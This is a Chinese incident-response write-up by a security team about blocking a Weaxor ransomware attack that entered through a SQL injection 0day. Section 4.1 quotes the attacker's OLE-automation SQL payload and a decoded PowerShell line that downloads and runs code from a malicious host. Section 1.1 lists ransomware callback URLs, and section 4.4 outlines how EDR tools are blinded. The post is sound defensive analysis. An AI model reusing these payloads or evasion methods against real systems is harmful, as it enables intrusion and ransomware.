文章总结： 文档分析了Weaxor勒索病毒变种及一次成功阻断案例。该病毒疑似基于Mallox源码修改，利用SQL注入0day漏洞入侵，并试图通过恶意驱动致盲EDR以实现静默加密。团队依托威胁情报及时响应，建议通过修补漏洞、限制数据库权限、部署WAF及输入校验等措施进行防护。 综合评分： 92 文章分类： 应急响应,恶意软件,漏洞分析,解决方案

---

【紧急警示】一次成功阻断Weaxor勒索病毒家族加密之路

原创

solarsec

solar应急响应团队

2025年6月10日 16:17 山东

在我们对5月份处理的各类勒索病毒入侵事件统计中，Weaxor勒索家族依然位列入侵频率最高的家族之一。本月观测到的新变种已出现扩展名变化，后缀包括.weax和.wxx，与4月活跃的变种有所不同，显示该家族在持续进行更新与变种迭代。

本次分享的案例源于我们在为某客户提供安全运营服务期间捕获的一次典型入侵事件。由于客户业务特殊，系统仅在节假日开放外网映射，但因存在多处在野高危漏洞，系统一经暴露便迅速遭受了Weaxor家族的攻击。接下来，我们将重点介绍本次事件的阻断过程及在此基础上总结的防护优化方法，供大家参考。

1. 勒索病毒组织介绍

Weaxor家族在2024年11月首次现身，该勒索病毒会将“.rox”扩展名附加到受感染文件的名称后，并留下名为“RECOVERY INFO.txt”的勒索信。信中包含了Weaxor家族的暗网地址，受害者可以通过该地址进入一个一对一的聊天界面，其他人无法访问。值得注意的是，暗网地址的首页为空白，这一设计显得格外耐人寻味。

一对一聊天界面

首页

1.1 疑似mallox源码修改

此加密器与mallox家族极其相似，疑似为mallox源码修改之后编译得到，mallox具体分析请参考文章【病毒分析】Mallox勒索家族新版本：加密算法全面解析

相似之处

1.都为不加密固定的五个语言俄语、哈萨克语、白俄罗斯语、乌克兰语和土库曼语；

2.都调整电源计划为高性能模式；

3.删除的注册表内容一致；

4.密钥生成和加密算法基本一致，但是rox在生成随机数的情况下又再次生成了0x38个字节的随机数，修复了mallox会被破解出密钥的情况；

5.信息回传的格式，以及url极其相似，mallox url如下：

http://193.106.191.141/QWEwqdsvsf/ap.php

rox url如下:

http://193.143.1.139/Ujdu8jjooue/biweax.php

不同之处

1.rox未对关机键进行隐藏；

2.获取文件方式不同，mallox获取文件方式为遍历文件，然后通过完成端口将文件提交到队列中，加密线程通过队列获取文件，而rox则是通过一个全局列表来传输；

3.rox开启了较高的编译优化，而malllox则没有。

2. 勒索病毒样本分析

该勒索病毒样本的技术细节，我们已在此前发布的分析文章中进行了全面解读，欢迎回顾查看【病毒分析】新崛起的weaxor勒索家族：疑似mallox家族衍生版，深度解析两者关联！

3. 攻击分析

5月31日12:11，我们在安全运营平台接收到客户主机离线告警。经确认，客户未进行任何操作，且服务器已处于断网状态。随后我们远程排查发现，客户部署的安全设备云查杀引擎异常断开，导致推送告警中断。针对这一情况，我们第一时间启动预警响应流程，向客户同步通报疑似遭受攻击的风险，并建议立即断开外网业务访问，配合后续进一步研判与溯源分析。

3.1 黑客攻击路线图

4. 溯源分析

4.1 溯源过程

注意：日志时间为 UTC+0 标准时间，中国标准时间为 UTC+8

1.【溯源分析过程】攻击者于 2025 年 5 月 31 日 12:05 第一次进行访问

图 1 攻击者首次访问

2.2025 年 5 月 31 日 12:07 攻击者利用 SQL 注入漏洞激活 OLE 自动化存储过程为后续通过 SQL Server 执行操作系统命令做准备

图 2 攻击者 SQL 注入攻击

3.2025 年 5 月 31 日 12:07 攻击者利用 SQL 注入漏洞执行PowerShell 从恶意网址 a.wersc.top 下载并执行远程代码

恶意请求分析： OLE自动化攻击流程

DECLARE@shellINT
EXECsp_oacreate'wscript.shell',@shellOUTPUT
EXECsp_oamethod@shell,'run',null,'sqlps-enc[BASE64]'

解码后的恶意Payload

IEX (New-ObjectSystem.Net.Webclient).DownloadString('http://a.wersc.top/abc')

4.2025年5月31日12:07攻击者上传恶意驱动试图关闭安全软件。

5.2025年5月31日12:08攻击者上传勒索病毒试图执行加密，已被安全软件阻止查杀。

4.2 溯源结果

攻击者此次攻击使用基于布尔盲注的SQL注入攻击，使用字符编码绕过简单过滤，经验证为该系统0day，已联系厂商进行修复。

攻击者于2025年5月31日12:05第一次进行访问，2025年5 月31日12:07攻击者利用SQL注入漏洞激活OLE自动化存储过程为后续通过SQLServer执行操作系统命令做准备，2025年5月31日12:07攻击者利用SQL注入漏洞（0day）执行PowerShell从恶意网址a.wersc.top下载并执行远程代码，2025年5月31日12:07攻击者上传恶意驱动试图关闭安全软件，2025年5月31日12:08攻击者上传勒索病毒试图执行加密，已被安全软件阻止查杀

4.3 流量阻断

黑客试图通过加载白驱动，劫持或阻断EDR（终端检测与响应）客户端与其云端服务之间的通信流量。攻击目标是切断EDR与管理服务器的数据交互，阻止威胁情报、终端行为日志及可疑样本的上传。通过这种方式，黑客意图削弱EDR的检测和响应能力，延缓安全团队对异常活动的感知和处置，从而为后续的横向移动、数据窃取或勒索加密操作创造更大的操作空间，但由于我们提前接入了威胁信息告警，在流量阻断的第一时间接收到告警并进行应急响应处理。

4.4 延伸科普

在成功实现EDR与云端服务器之间流量阻断之后，攻击者进一步升级攻击手段，部署具备致盲能力的恶意驱动。该驱动不仅中断了agent与后台之间的威胁情报通信，还具备深度干扰和屏蔽能力，能够绕过EDR本地检测机制，使其在不产生任何告警、不触发任何异常日志记录的情况下，完成对目标终端的数据加密操作。

具体而言，致盲驱动通过内核级钩子（Hook）或内存篡改等底层手段，拦截并篡改EDR的核心模块响应，导致EDR在面对进程注入、文件加密、服务禁用等典型恶意行为时，无法正常捕获行为特征或触发告警策略。由于EDR在表面上仍维持“运行正常”的假象，安全团队难以及时察觉终端被攻陷的事实，极大地延长了攻击者在系统中的潜伏与操作窗口。

整体来看，流量阻断与驱动致盲的组合策略，显著削弱了EDR的可见性与响应能力，实现了对终端环境的“静默失守”，使勒索攻击具备更高的隐蔽性、持久性和破坏性。

5. 后续加固

1.后续，团队应急响应人员第一时间介入，迅速对受影响主机进行全面排查。通过全盘杀毒扫描，清理潜在的恶意软件，并重点检查系统计划任务、启动项及服务配置，排除可能存在的后门植入与异常自启动行为。同时，结合日志审计与内存取证，进一步确认系统当前状态，确保未留存任何可疑残留或隐蔽持久化机制。

2.随后，我们主动联系系统厂商，确认此次事件中相关漏洞的具体影响范围，获取官方修复建议与最新补丁版本。根据厂商提供的指导方案，协助客户完成系统漏洞修复与加固工作。修复完成后，团队组织多轮漏洞扫描与渗透测试，验证修复效果，确保漏洞已彻底封堵，系统恢复至安全稳定状态。同时，针对本次事件，协助客户更新安全基线配置，提升整体防护能力，防止类似攻击再次发生。

3.同时，我们同步联系安全防护软件厂商，详细反馈此次事件中发现的云查杀引擎致盲问题及相关技术细节。厂商技术团队在接到反馈后迅速响应，针对漏洞点进行修复和版本升级。我们协助配合完成修复版本的测试验证，确认新版本在功能完整性与防护能力上无异常，确保防护软件恢复正常工作状态，有效提升了客户环境的整体安全性和防御韧性。

6. 防范措施

6.1 升级与补丁

定期对操作系统、应用软件及安全防护产品进行补丁更新，修复已知漏洞，降低被勒索病毒利用的风险。建议建立补丁管理机制，确保关键系统优先更新，提升整体防护能力。

6.2 数据库账户最小权限原则

仅为应用分配最低权限数据库账户（禁止使用sa等高权限账户）；

禁止执行如xp_cmdshell、sp_configure等高危系统命令。

6.3 组件执行权限控制

禁止Web服务账户写入/执行权限访问系统关键目录（如C:\Windows\Temp）；

限制 .jsp、.aspx 等脚本扩展在上传目录中执行。

6.4 部署Web应用防火墙（WAF）

启用SQL注入、命令注入、远程代码执行等规则；

自定义规则过滤含有 UNION SELECT、xp_cmdshell、1=1 等敏感语句请求。

6.5 输入合法性校验

开启应用系统的表单字段白名单机制，限制输入内容长度、格式和字符集；

对特殊字符（如引号、分号、单双破折号等）进行过滤或转义。

以下是solar安全团队近期处理过的常见勒索病毒后缀：

| | | | | — | — | — | | 收录时间 | 病毒家族 | 相关文章 | | 2025/01/14 | medusalocker | 【病毒分析】深入剖析MedusaLocker勒索家族：从密钥生成到文件加密的全链路解析 | | 2025/01/15 | medusa | 【病毒分析】“美杜莎”勒索家族：从入侵到结束的全流程深度解析 | | 2024/12/11 | weaxor | 【病毒分析】新崛起的weaxor勒索家族：疑似mallox家族衍生版，深度解析两者关联！ | | 2024/10/23 | RansomHub | 【病毒分析】Ransom Hub:唯一不攻击中国的2024全球Top1勒索家族——ESXi加密器深度解析 | | 2024/11/23 | Fx9 | 【病毒分析】Fx9家族首次现身！使用中文勒索信，熟练勒索谈判 | | 2024/11/04 | Makop | 【病毒分析】揭秘.mkp后缀勒索病毒！Makop家族变种如何进行可视化加密？ | | 2024/06/26 | moneyistime | 【病毒分析】使用中文勒索信及沟通：MoneyIsTime 勒索家族的本地化语言转变及其样本分析 | | 2024/04/11 | babyk | 【病毒分析】BabyK加密器分析-Windows篇 【病毒分析】Babyk加密器分析-NAS篇 【病毒分析】Babyk加密器分析-EXSI篇 【病毒分析】Babuk家族babyk勒索病毒分析 【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目 | | 2024/09/29 | lol | 【病毒分析】全网首发！全面剖析.LOL勒索病毒，无需缴纳赎金，破解方案敬请期待下篇！ 【工具分享】.LOL勒索病毒再也不怕！完整破解教程分享+免费恢复工具首发 | | 2024/06/10 | MBRlock | 【病毒分析】假冒游戏陷阱：揭秘MBRlock勒索病毒及其修复方法 | | 2024/06/01 | Rast gang | 【病毒分析】Steloj勒索病毒分析 | | 2024/06/01 | TargetOwner | 【病毒分析】技术全面升级，勒索赎金翻倍，新版本TargetOwner勒索家族强势来袭？ | | 2024/11/02 | Lockbit 3.0 | 【病毒分析】Lockbit家族Lockbit 3.0加密器分析 【成功案例】RDP暴露引发的蝴蝶效应：LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵 【成功案例】lockbit家族百万赎金不必付！技术手段修复被加密的数据库，附溯源分析报告 【病毒分析】繁体勒索信暗藏玄机！要价50万RMB赎金的Lockbit泄露版分析 | | 2024/05/15 | wormhole | 【病毒分析】Wormhole勒索病毒分析 | | 2024/03/20 | tellyouthepass | 【病毒分析】locked勒索病毒分析 【病毒分析】中国人不骗中国人？_locked勒索病毒分析 | | 2024/03/01 | lvt | 【病毒分析】交了赎金也无法恢复–针对国内某知名NAS的LVT勒索病毒最新分析 | | 2024/03/04 | phobos | 【病毒分析】phobos家族2700变种加密器分析报告 【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目 【病毒分析】phobos家族faust变种加密器分析 【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目 【病毒分析】phobos家族Elbie变种加密器分析报告 | | 2024/03/28 | DevicData | 【病毒分析】DevicData勒索病毒分析 【病毒分析】DevicData家族扩散：全球企业和机构成为勒索病毒头号攻击目标！ | | 2024/02/27 | live | 【病毒分析】独家揭秘LIVE勒索病毒家族之1.0（全版本可解密） 【病毒分析】独家揭秘LIVE勒索病毒家族之1.5（全版本可解密） 【病毒分析】独家揭秘LIVE勒索病毒家族之2.0（全版本可解密） | | 2024/08/16 | CryptoBytes | 【独家破解】揭秘境外黑客组织的20美元锁机病毒：深度逆向分析+破解攻略！赎金？给你付个🥚 | | 2024/03/15 | mallox | 【病毒分析】mallox家族malloxx变种加密器分析报告 【病毒分析】Mallox勒索家族新版本：加密算法全面解析 【病毒分析】全网首发！袭扰国内top1勒索病毒家族Mallox家族破解思路及技术分享 【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目 【病毒分析】mallox家族rmallox变种加密器分析报告 【病毒分析】Mallox家族再进化：首次瞄准Linux，勒索新版本全面揭秘！ | | 2024/07/25 | BeijngCrypt | 【病毒分析】全网首发！以国内某安全厂商名字为后缀的勒索病毒分析 | | 2025/03/11 | 银狐 | 【病毒分析】潜伏在AI工具中的幽灵：银狐家族社工攻击的深度剖析 | | 2025/03/07 | CTF赛题 | 【病毒分析】伪造微软官网+勒索加密+支付威胁，CTF中勒索病毒解密题目真实还原！ 【病毒分析】2024年网鼎杯朱雀组REVERSE02——关于勒索木马解密详解 | | 2025/05/14 | 888 | 【病毒分析】888勒索家族再出手！幕后加密器深度剖析 |

勒索攻击作为成熟的攻击手段，很多勒索家族已经形成了一套完整的商业体系，并且分支了很多团伙组织，导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同，TellYouThePass勒索软件家族常常利用系统漏洞进行攻击；Phobos勒索软件家族通过RDP暴力破解进行勒索；Mallox勒索软件家族利用数据库及暴力破解进行加密，攻击手法极多防不胜防。

| | | | — | — | | 收录时间 | 相关文章 | | 2024/12/12 | 【攻击手法分析】勒索病毒如何轻松绕过安全设备防线：第二篇-流量致盲，无声突破 | | 2024/12/11 | 【攻击手法分析】勒索病毒如何轻松绕过安全设备防线：第一篇-驱动漏洞一击致命 |

而最好的预防方法就是针对自身业务进行定期的基线加固、补丁更新及数据备份，在其基础上加强公司安全人员意识。

| | | | — | — | | 收录时间 | 相关文章 | | 2024/06/27 | 【教程分享】勒索病毒来袭！教你如何做好数据防护 | | 2024/06/24 | 【教程分享】服务器数据文件备份教程 |

案例介绍篇聚焦于真实的攻击事件，还原病毒家族的攻击路径和策略，为用户提供详细的溯源分析和防护启示；

| | | | — | — | | 收录时间 | 相关文章 | | 2024/06/27 | 【案例介绍】赎金提高，防御失效：某上市企业两年内两度陷入同一勒索团伙之手 | | 2024/01/26 | 【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目 | | 2024-03-13 | 【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目 | | 2024-04-01 | 【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目 | | 2024-04-26 | 【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目 | | 2024-05-17 | 【成功案例】RDP暴露引发的蝴蝶效应：LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵 | | 2024-11-28 | 【成功案例】lockbit家族百万赎金不必付！技术手段修复被加密的数据库，附溯源分析报告 |

漏洞与预防篇侧重于技术层面的防御手段，针对病毒利用的漏洞和安全弱点，提出操作性强的应对方案：

| | | | — | — | | 收录时间 | 相关文章 | | 2025/01/08 | 【漏洞与预防】RDP弱口令漏洞预防 | | 2025/01/21 | 【漏洞与预防】MSSQL数据库弱口令漏洞预防 | | 2025/02/18 | 【漏洞与预防】远程代码执行漏洞预防 | | 2025/04/10 | 【漏洞与预防】Atlassian Confluence存在远程代码执行漏洞 | | 2025/04/17 | 【漏洞与预防】畅捷通文件上传漏洞预防 | | 2025/05/27 | 【漏洞与预防】Microsoft Windows 文件资源管理器欺骗漏洞预防 |

应急响应工具教程篇重点分享应急响应过程中常用工具的安装、配置与使用说明，旨在帮助读者快速掌握这些工具的操作流程与技巧，提高其在实际应急场景中的应用熟练度与效率。

| | | | — | — | | 收录时间 | 相关文章 | | 2025/01/10 | 【应急响应工具教程】Splunk安装与使用 | | 2025/02/07 | 【应急响应工具教程】取证工具-Volatility安装与使用 | | 2025/02/20 | 【应急响应工具教程】流量嗅探工具-Tcpdump | | 2025/02/26 | 【应急响应工具教程】一款精准搜索文件夹内容的工具–FileSeek | | 2025/03/03 | 【应急响应工具教程】一款自动化分析网络安全应急响应工具–FindAll | | 2025/03/13 | 【应急响应工具教程】Windows 系统操作历史监控与审计工具-LastActivityView | | 2025/03/20 | 【应急响应工具教程】镜像取证之挂载镜像——Arsenal Image Mounter | | 2025/04/03 | 【应急响应工具教程】Windows 系统综合排查工具Hawkeye | | 2025/04/08 | 【应急响应工具教程】Linux下应急响应工具whohk | | 2025/05/15 | 【应急响应工具教程】Windows日志快速分析工具——Chainsaw |

如果您想了解有关勒索病毒的最新发展情况，或者需要获取相关帮助，请关注“solar专业应急响应团队”。

全国热线|400-613-6816

更多资讯 扫码加入群组交流

喜欢此内容的人还喜欢

【紧急警示】Weaxor最新变种“.wxx”来袭，批量入国内知名财务类管理系统发起勒索攻击！

索勒安全团队

【应急响应工具教程】Logman 系统性能与日志采集工具

索勒安全团队

【病毒分析】888勒索家族再出手！幕后加密器深度剖析 索勒安全团队

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：solar应急响应团队 solarsec《【紧急警示】一次成功阻断Weaxor勒索病毒家族加密之路》